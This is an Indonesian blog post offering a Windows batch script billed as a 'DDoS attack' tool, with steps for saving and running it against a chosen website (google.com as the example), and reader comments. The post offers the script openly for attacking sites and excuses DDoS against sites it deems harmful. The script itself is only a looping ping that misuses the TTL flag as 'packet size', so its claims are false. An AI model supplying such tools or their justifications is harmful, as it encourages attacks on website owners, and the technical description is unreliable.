Skip to content Skip to sidebar Skip to footer

Cara DDoS Website dengan Script DDoS Notepad

Cara Melakukan Serangan DDoS dengan Notepad - Ada begitu banyak cara yang bisa kita gunakan untuk melakukan serangan DDoS terhadap sebuah website. Mulai dari cara yang termudah yaitu; menggunakan aplikasi DDoS yang sudah jadi. Sampai cara yang tersulit, yaitu; membuat program DDoS attack sendiri menggunakan rangkaian kode-kode tertentu yang pastinya membuat kepala orang awam terasa ingin pecah ketika melihatnya.

Baca juga : Kumpulan Script Deface Keren dan Simpel

Buat yang belum tahu, DDoS atau Distributed Denial of Service Attack adalah suatu upaya yang dilakukan oleh sekelompok orang yang menginginkan website milik orang lain hancur atau istilah kerennya 'down'. Biasanya, website-website yang menjadi incaran para DDoS Attacker ini adalah website yang dinilai berdampak negatif, merusak ekosistem internet dan juga norma masyarakat, terutama di Indonesia.
Tentunya kegiatan semacam DDoS ini tidak bisa langsung dicap sebagai kegiatan yang berbahaya. Sebab, ibarat sebuah pisau dapur. Jika digunakan sebagai alat memotong sayur tentu akan sangat berguna, sedangkan apabila digunakan untuk mengiris kulit teman pastinya bisa sangat berbahaya. Prinsip kegiatan DDoS pun sebetulnya sama seperti itu, tergantung siapa penggunanya dan apa tujuannya.

Jika tujuannya hanya untuk iseng semata pastinya tidak boleh karena bisa merugikan si pemilik website. Nah, apabila tujuannya untuk testing website yang baru dibuat, maka itu sah-sah saja. Sebab, ada beberapa web developer yang melakukan testing seberapa kuat websitenya menggunakan sistem DDoS seperti ini.

Oleh karenanya, di artikel ini saya berencana ingin berbagi pada sobat semua script DDoS notepad. Nantinya script ini bisa sobat gunakan untuk melakukan serangan DDoS hanya bermodalkan sebuah aplikasi notepad yang ada di komputer/laptop sobat. Saya harap, script DDoS ini hanya digunakan sebagai penambah wawasan saja, tidak untuk hal-hal lain yang bersifat merugikan.

Bagaimana caranya? Berikut adalah langkah-langkah melakukan serangan DDoS website menggunakan script DDoS Notepad. Check it Out!

1. Langkah pertama pastikan sobat sudah menyalakan laptop sobat :v Setelah itu langsung buka aplikasi notepad.

2. Kemudian copy script ddos di bawah ini, lalu paste di notepad sobat.
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS  
3. Simpan script tersebut tersebut dengan format .bat. Contoh : Scriptddos.bat. Jangan lupa ganti save as type nya menjadi All Files.
4. Selesai.

Untuk tata cara penggunaan dari script DDoS notepad ini bisa dibilang sangat gampang dan simpel sekali. Berikut adalah caranya.
  1. Buka file ddos yang barusan sobat buat.
  2. Pada server target, silahkan isi dengan website yang ingin sobat ddos. Sebagai contoh, di sini saya ingin menyerang Google.com :v Maka saya mengisinya dengan www.google.com.
  3. Setelah itu sobat akan disuruh untuk memasukan ip Host dari website yang ingin sobat ddos. Silahkan isi dengan ip host yang muncul di atas.
  4. Kemudian masukan jumlah paket / ukuran ddos yang ingin sobat kirimkan. Misalnya '999999'.
  5. Terakhir klik enter. Dan proses DDoS pun telah berjalan.
  6. Selesai.
Demikianlah cara ddos website menggunakan script ddos notepad yang dapat saya bagikan. Saya harap, script ini bisa dipergunakan dengan bijak dan tidak merugikan siapapun. 

Apabila ada yang ingin ditanyakan, silahkan tulis di bawah. Akan saya jawab dengan sebaik mungkin.

Semoga membantu :D
Taufiq
Taufiq Life is Journey :)

2 comments for "Cara DDoS Website dengan Script DDoS Notepad"

  1. ini kok gak bisa ya scriptnya

    ReplyDelete
    Replies
    1. Coba diulangi lagi gan, mungkin ada yg terlewat. Soalnya kode nya ga ada yg diubah sedikitpun, masih sama sejak saya posting artikel ini.

      Delete

Post a Comment